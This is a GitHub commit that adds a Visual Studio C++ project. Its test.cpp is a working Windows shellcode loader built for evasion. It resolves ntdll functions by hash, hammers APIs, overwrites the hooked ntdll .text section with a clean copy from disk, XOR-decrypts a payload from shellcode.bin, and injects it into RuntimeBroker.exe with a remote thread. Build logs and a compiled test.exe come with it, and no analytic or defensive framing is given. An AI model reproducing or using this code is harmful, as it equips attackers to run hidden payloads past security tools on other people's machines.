Add files via upload

This commit is contained in:
jason123
2024-12-11 11:46:31 +08:00
committed by GitHub
parent 5b80815c29
commit 56295618e6
22 changed files with 479 additions and 0 deletions

test/test.cpp Normal file

@@ -0,0 +1,263 @@
#include <windows.h>
#include <tlhelp32.h>
#include <vector>
#include <fstream>
#include <iterator>
#include <winternl.h>
#include <threadpoolapiset.h>
#include <unordered_map>
#include <string>
#pragma comment(lib, "ntdll.lib")
std::unordered_map<DWORD, FARPROC> apiHashTable;
DWORD HashString(const char* str) {
DWORD hash = 0;
while (*str) {
hash = ((hash << 5) + hash) + *str++;
}
return hash;
}
FARPROC ResolveAPI(DWORD hash) {
if (apiHashTable.find(hash) != apiHashTable.end()) {
return apiHashTable[hash];
}
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (!hNtdll) return nullptr;
auto pExportDir = reinterpret_cast<PIMAGE_EXPORT_DIRECTORY>(
reinterpret_cast<BYTE*>(hNtdll) +
reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(hNtdll) +
reinterpret_cast<PIMAGE_DOS_HEADER>(hNtdll)->e_lfanew)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
auto pNames = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNames);
auto pFunctions = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfFunctions);
auto pOrdinals = reinterpret_cast<WORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNameOrdinals);
for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
const char* apiName = reinterpret_cast<const char*>(reinterpret_cast<BYTE*>(hNtdll) + pNames[i]);
DWORD apiHash = HashString(apiName);
if (apiHash == hash) {
auto proc = reinterpret_cast<FARPROC>(reinterpret_cast<BYTE*>(hNtdll) + pFunctions[pOrdinals[i]]);
apiHashTable[hash] = proc;
return proc;
}
}
return nullptr;
}
void APIHammering() {
for (int i = 0; i < 100; i++) {
LoadLibraryA("kernel32.dll");
LoadLibraryA("user32.dll");
GetModuleHandleA("ntdll.dll");
}
}
void ObfuscateString(std::string& str, unsigned char key) {
for (auto& c : str) {
c ^= key;
}
}
typedef BOOL(WINAPI* LPDSENUMATTRIBUTES)(void* lpShellcode);
void DecryptShellcode(std::vector<unsigned char>& shellcode, unsigned char key) {
for (size_t i = 0; i < shellcode.size(); ++i) {
shellcode[i] ^= key;
}
}
void UnhookNtdll() {
DWORD hashVirtualProtect = HashString("VirtualProtect");
FARPROC pVirtualProtect = ResolveAPI(hashVirtualProtect);
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
if (!hNtdll) return;
wchar_t systemDir[MAX_PATH] = { 0 };
GetSystemDirectory(systemDir, MAX_PATH);
wchar_t ntdllPath[MAX_PATH] = { 0 };
wcscat_s(ntdllPath, systemDir);
wcscat_s(ntdllPath, L"\ntdll.dll");
HANDLE hFile = CreateFile(ntdllPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hFile == INVALID_HANDLE_VALUE) return;
DWORD fileSize = GetFileSize(hFile, nullptr);
if (fileSize == INVALID_FILE_SIZE) {
CloseHandle(hFile);
return;
}
HANDLE hMapping = CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, fileSize, nullptr);
if (!hMapping) {
CloseHandle(hFile);
return;
}
void* pFileData = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
if (!pFileData) {
CloseHandle(hMapping);
CloseHandle(hFile);
return;
}
auto pLoadedNtdll = reinterpret_cast<BYTE*>(hNtdll);
auto pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(pFileData);
auto pNtHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(pFileData) + pDosHeader->e_lfanew);
auto pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders);
for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++) {
if (!strcmp(reinterpret_cast<char*>(pSectionHeader->Name), ".text")) {
DWORD oldProtect;
reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
pLoadedNtdll + pSectionHeader->VirtualAddress,
pSectionHeader->Misc.VirtualSize,
PAGE_EXECUTE_READWRITE,
&oldProtect
);
memcpy(
pLoadedNtdll + pSectionHeader->VirtualAddress,
reinterpret_cast<BYTE*>(pFileData) + pSectionHeader->PointerToRawData,
pSectionHeader->SizeOfRawData
);
reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
pLoadedNtdll + pSectionHeader->VirtualAddress,
pSectionHeader->Misc.VirtualSize,
oldProtect,
&oldProtect
);
break;
}
}
UnmapViewOfFile(pFileData);
CloseHandle(hMapping);
CloseHandle(hFile);
}
void ExecuteShellcodeWithThreadpool(const std::vector<unsigned char>& shellcode) {
void* execMemory = VirtualAlloc(
nullptr,
shellcode.size(),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (!execMemory) {
return;
}
memcpy(execMemory, shellcode.data(), shellcode.size());
PTP_WORK work = CreateThreadpoolWork(
[](PTP_CALLBACK_INSTANCE, void* context, PTP_WORK) {
auto shellcodePtr = reinterpret_cast<void(*)()>(context);
shellcodePtr();
},
execMemory,
nullptr
);
if (work) {
SubmitThreadpoolWork(work);
WaitForThreadpoolWorkCallbacks(work, FALSE);
CloseThreadpoolWork(work);
}
VirtualFree(execMemory, 0, MEM_RELEASE);
}
DWORD FindProcessId(const wchar_t* processName) {
PROCESSENTRY32 pe32;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (!_wcsicmp(pe32.szExeFile, processName)) {
CloseHandle(hSnapshot);
return pe32.th32ProcessID;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
return 0;
}
void RemoteFunctionStompingInjection(const std::vector<unsigned char>& shellcode) {
DWORD processId = FindProcessId(L"RuntimeBroker.exe");
if (processId == 0) {
return;
}
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);
if (!hProcess) {
return;
}
void* remoteMemory = VirtualAllocEx(hProcess, nullptr, shellcode.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remoteMemory) {
CloseHandle(hProcess);
return;
}
if (!WriteProcessMemory(hProcess, remoteMemory, shellcode.data(), shellcode.size(), nullptr)) {
VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
CloseHandle(hProcess);
return;
}
HMODULE hModule = GetModuleHandleA("kernel32.dll");
FARPROC loadLibraryAddr = GetProcAddress(hModule, "LoadLibraryA");
HANDLE hThread = CreateRemoteThread(hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(remoteMemory), nullptr, 0, nullptr);
if (hThread) {
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}
VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
CloseHandle(hProcess);
}
int main() {
const char* filename = "shellcode.bin";
const unsigned char key = 0x5A;
APIHammering(); // Add hammering before starting
UnhookNtdll();
std::ifstream file(filename, std::ios::binary);
if (!file.is_open()) {
return -1;
}
std::vector<unsigned char> encryptedShellcode(
(std::istreambuf_iterator<char>(file)),
std::istreambuf_iterator<char>()
);
file.close();
if (encryptedShellcode.empty()) {
return -1;
}
DecryptShellcode(encryptedShellcode, key);
RemoteFunctionStompingInjection(encryptedShellcode);
return 0;
}

test/test.sln Normal file

@@ -0,0 +1,31 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.11.35303.130
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test", "test.vcxproj", "{E178E088-6629-4401-8E22-F7BA9D927D22}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x64.ActiveCfg = Debug|x64
{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x64.Build.0 = Debug|x64
{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x86.ActiveCfg = Debug|Win32
{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x86.Build.0 = Debug|Win32
{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x64.ActiveCfg = Release|x64
{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x64.Build.0 = Release|x64
{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x86.ActiveCfg = Release|Win32
{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {7A638454-64BA-4B7F-95DE-878858108F1A}
EndGlobalSection
EndGlobal

test/test.vcxproj Normal file

@@ -0,0 +1,135 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>17.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{e178e088-6629-4401-8e22-f7ba9d927d22}</ProjectGuid>
<RootNamespace>test</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="test.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

test/test.vcxproj.filters Normal file

@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="test.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
</Project>

test/test.vcxproj.user Normal file

@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\Jason\source\repos\test\x64\Release\test.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>

Binary file not shown.

Binary file not shown.


@@ -0,0 +1,7 @@
test.cpp
正在生成代码
3 of 380 functions ( 0.8%) were compiled, the rest were copied from previous compilation.
2 functions were new in current compilation
1 functions had inline decision re-evaluated but remain unchanged
已完成代码的生成
test.vcxproj -> C:\Users\Jason\source\repos\test\x64\Release\test.exe

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.


@@ -0,0 +1 @@
C:\Users\Jason\source\repos\test\test.cpp;C:\Users\Jason\source\repos\test\test\x64\Release\test.obj

Binary file not shown.

Binary file not shown.


@@ -0,0 +1,3 @@
^C:\USERS\JASON\SOURCE\REPOS\TEST\TEST\X64\RELEASE\TEST.OBJ
C:\Users\Jason\source\repos\test\test\x64\Release\test.IPDB
C:\Users\Jason\source\repos\test\test\x64\Release\test.iobj

Binary file not shown.


@@ -0,0 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
Release|x64|C:\Users\Jason\source\repos\test\|

Binary file not shown.

test/x64/Release/test.exe Normal file

Binary file not shown.

test/x64/Release/test.pdb Normal file

Binary file not shown.